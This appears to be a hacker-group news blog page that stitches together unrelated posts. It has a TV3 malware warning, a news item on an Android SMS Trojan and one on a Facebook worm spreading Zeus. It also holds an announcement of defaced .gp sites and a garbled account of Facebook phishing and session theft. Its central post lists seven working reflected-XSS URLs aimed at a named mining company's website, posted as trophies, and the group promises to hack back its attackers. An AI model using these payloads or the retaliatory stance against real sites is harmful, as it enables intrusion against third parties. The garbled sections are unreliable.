PLs Pls This A Serious TV3 Website Is Affected With A Malware Which May Harm Your PC

PLS PLS This  Serious TV3 Website Is Affected With A Malware Which May Harm Your PC. Our research shows that the virus was from a Chinese Group of hackers. With this we the Ghana Cyber warns the Public to stay away from the site for a while till TV3 deals with the Problem.

TV3  Malware

Vulnerability Description

网站被google屏蔽 通过google搜索您的网站，搜索结果中会显示“该网站可能含有恶意软件，有可能会危害您的电脑”。 如果使用chrome或firefox浏览器直接访问您的网站，此时打开的页面不是您网站本身页面，而是谷歌的提示页面，提示“访问该网站可能会损害您的计算机！”或“已报告的攻击页面！”等字句来警告访问的用户。

Vulnerability Impact

如果网站被google屏蔽，那么从google搜索引擎过来的流量必然受到严重影响；而关键是对网站信誉造成严重影响。

Vulnerability Recommendation

一：确认网站是否被挂马或有病毒，如果有，先清理 二：扫描并修复网站漏洞 三：根据google的要求重新进行审核

Additional Info

Vulnerability content

Site is listed as suspicious - visiting this web site may harm your computer.

We as a Group are doing Everything in Our Power to Pay Back these Hackers with a taste of their Own. TV3 can Contact us if the need be and any can inform their admins about this.

Multiple XSS Pages Found In Gold Fields (goldfields) by Ge3h

The Ghana Cyber Army is at it again.
Ge3h found these Multiple XSSeds in Gold Fields funny hmhhm with the gold they no fit
keep a single site protected.

Links:
http://www.goldfields.co.za/search.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

http://www.goldfields.co.za/inv_calendar.php?yearMonthDay=20111110&yearMonth=201111%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x000823)%3C%2Fscript%3E

http://www.goldfields.co.za/search.php?zoom_and=0&zoom_per_page=3&zoom_query=3&zoom_sort='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A83)%3C/script%3E

http://www.goldfields.co.za/search.php?zoom_query=3&zoom_and=1&zoom_sort='"--></style></script><script>alert(0x000A87)</script>

http://www.goldfields.co.za/inv_calendar.php?yearMonth=201110%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x000F5E)%3C%2Fscript%3E

http://www.goldfields.co.za/search.php?zoom_query=search+this+site&zoom_page=2%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x001C4A)%3C%2Fscript%3E&zoom_per_page=10&zoom_cat=-1&zoom_and=0&zoom_sort=0

http://www.goldfields.co.za/search.php?zoom_query=search+this+site&zoom_page=2&zoom_per_page=10%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x001C8F)%3C%2Fscript%3E&zoom_cat=-1&zoom_and=0&zoom_sort=0


And even more to come................................................ soon

Guadeloupe Google / Microsoft/ Motorola / Orange / Facebook / Youtube / Myspace / Live / Hotmail / Bing / Visa / Opera / Gmail / Joomla / Ubuntu / Internet / Bank America Hacked By dr@g

A Hacker called dr@g has Hacked Guadeloupe Google / Microsoft/ Motorola / Orange / Facebook / Youtube / Myspace / Live / Hotmail / Bing / Visa / Opera / Gmail / Joomla / Ubuntu / Internet / Bank America has been Hacked and has Defaced it. The Hacker is in the team called Moroccain Security Cr3w.

Site:
http://www.google.gp/
http://www.google.com.gp/
http://www.google.net.gp/
http://microsoft.gp/
http://internet.gp/
http://motorola.gp/
http://orange.gp/
http://www.oracle.gp/
http://opera.gp/
http://ubuntu.gp/
http://yahoo.gp/
http://www.facebook.gp/
http://www.youtube.gp/
http://www.bing.gp/
http://www.joomla.gp/
http://www.myspace.gp/
http://www.ciscosystems.gp/
http://www.googleplus.gp/
http://www.gmail.gp/
http://live.gp/
http://bankamerica.gp/

Mirror:
http://www.zone-h.com/mirror/id/14877986
http://www.zone-h.com/mirror/id/14877923
http://www.zone-h.com/mirror/id/14877133
http://www.zone-h.com/mirror/id/14877973
http://www.zone-h.com/mirror/id/14877865
http://www.zone-h.com/mirror/id/14877897
http://www.zone-h.com/mirror/id/14877917
http://www.zone-h.com/mirror/id/14877916
http://www.zone-h.com/mirror/id/14877915
http://www.zone-h.com/mirror/id/14877912
http://www.zone-h.com/mirror/id/14877082
http://www.zone-h.com/mirror/id/14877090
http://www.zone-h.com/mirror/id/14877091
http://www.zone-h.com/mirror/id/14877094
http://www.zone-h.com/mirror/id/14877096
http://www.zone-h.com/mirror/id/14877119
http://www.zone-h.com/mirror/id/14877171
http://www.zone-h.com/mirror/id/14877235
http://www.zone-h.com/mirror/id/14877294
http://www.zone-h.com/mirror/id/14877820
http://www.zone-h.com/mirror/id/14877983
http://www.zone-h.com/mirror/id/14877864

Hacking a Facebook Account using Facebook

Many of us know that phishing is also a trick to hack a facebook and session hijicking but hacker can do both at a same time. This vulnerability was happened on Facebook (static FBML) .Example here

What user will do ??
1. Checks for the URL.
2. Checks for which year the page was create.

Is it easy to fool the people?
Yes, by creating a new page in facebook in such way that user has to beliveness.

How its work??
1.Once the user clicks the link the session(cookies) where stolen by the hacker using That he can login any users account without a username and password
2. usually the users will check for the URL once it was known 1 they can enterning a userename and password.
3.After hitting the button Test your Password , Page will reflect a Thankyou Msg and it will popup with a paswd Rank 
4. Check ur email spam there must a email on this and it will say that ur password was wrong trying again 

Countermeasures:
1.Dont click a new link from a person u don’t know..
2.Facebook is not going to ask ur password is strong are not.
3.Some of the virus and worm (scam) was spreading in facebook applications.

SMS Trojans Spreading to the Rest of the World

SMS Trojans that ride along on supposedly benign mobile apps and then send out messages to high-priced numbers have been a problem in some Asian and Eastern European countries for several years now, most notably in Russia and China. But now the attackers have realized that there's a whole big world of users out there to target and have begun going after people in other countries with new strains of SMS malware.

A new SMS Trojan that has been seen in some limited infections so far, is targeting users in a number of European and western countries right now, including Belgium, Canada, France, Germany, Luxembourg, Spain, Switzerland and the UK. The Trojan has a couple of main functions, each of which is designed to deceive the user and surreptitiously run up charges on her mobile bill.

The Trojan has been seen thus far hiding inside an app that supposedly monitors the victim's SMS and data usage on the device.

The Android app has shown up on file-sharing sites under the name SuiConFo.apk, according to research by Kaspersky Lab researcher Denis Maslennikov, and once it's installed on a victim's device, it will initially display an error message saying that the user's device isn't compatible with the app. That's just the beginning, however.

"Right after displaying this message the Trojan will call the public method getSimCountryIso in the TelephonyManagerclass in order to retrieve the ISO country code of the SIM card," Maslennikov wrote. "After defining the country and, therefore, the number and message text, the Trojan will send 4 SMS messages with the help of thesendTextMessage method. SMSReceiver.class is responsible for hiding incoming SMS messages from particular numbers. If there is an incoming SMS message from one of the following numbers: 81001, 35064, 63000, 9903, 60999, 543, 64747, then the Trojan will try to hide it using the abortBroadcast method. The number itself is retrieved from the SMS message with the help of getDisplayOriginatingAddress."

So the Trojan will remain in the background, checking for incoming messages from specific SMS numbers, and will then hide those messages from the user so she isn't aware of the infection and the fact that outgoing messages are being sent to premium-rate numbers. The charges for those messages can accumulate quickly, and if the user isn't aware that they're being sent, it can be an expensive infection.

Researchers have found similar SMS Trojans going after users in the United States, the UK and the Netherlands in recent months, but infections have been limited so far. That may well change as the popularity of Android devices--which have been the main target for SMS Trojans--continues to increase.

New Facebook Worm installing Zeus Bot in your Computer

Today another new attack on Facebook users with Zeus Bot comes in action. The researchers of Danish security firm CSIS, has spotted a worm spreading within the Facebook platform. A new worm has popped up on Facebook, using apparently stolen user credentials to log in to victims' accounts and then send out malicious links to their friends. The worm also downloads and installs a variety of malware on users' machines, including a variant of the Zeus bot.

If followed, the link takes the potential victim to a page where he or she are offered what appears to be a screensaver for download. Unfortunately, it is not a JPG file, but an executable (b.exe). Once run, it drops a cocktail of malicious files onto the system, including ZeuS, a popular Trojan spyware capable of stealing user information from infected systems. The worm is also found to have anti-VM capabilities, making it useless to execute and test in a virtual environment, such as Oracle VM VirtualBox and VMWare.

Zeus is a common tool in the arsenal of many attackers these days, and is used in a wide variety of attacks and campaigns now. It used to be somewhat less common, but the appearance of cracked versions of the Zeus code has made it somewhat easier for lower-level attackers to get their hands on the malware. Zeus has a range of capabilities, and specializes in stealing sensitive user data such as banking credendtials, from infected machines.

"The worm carries a cocktail of malware onto your machine, including a Zbot/ZeuS variant which is a serious threat and stealing sensitive information from the infected machine," warn the researchers.The worm is hosted on a variety of domains, so the link in the malicious message may vary. Other servers are used to collect the data sent by the aforementioned malware and to serve additional malicious software.

This type of thing is very rare to just send to your email without you requesting it so I would advise anyone who thinks that you may have seen an email like this to delete it and mark it as spam right away.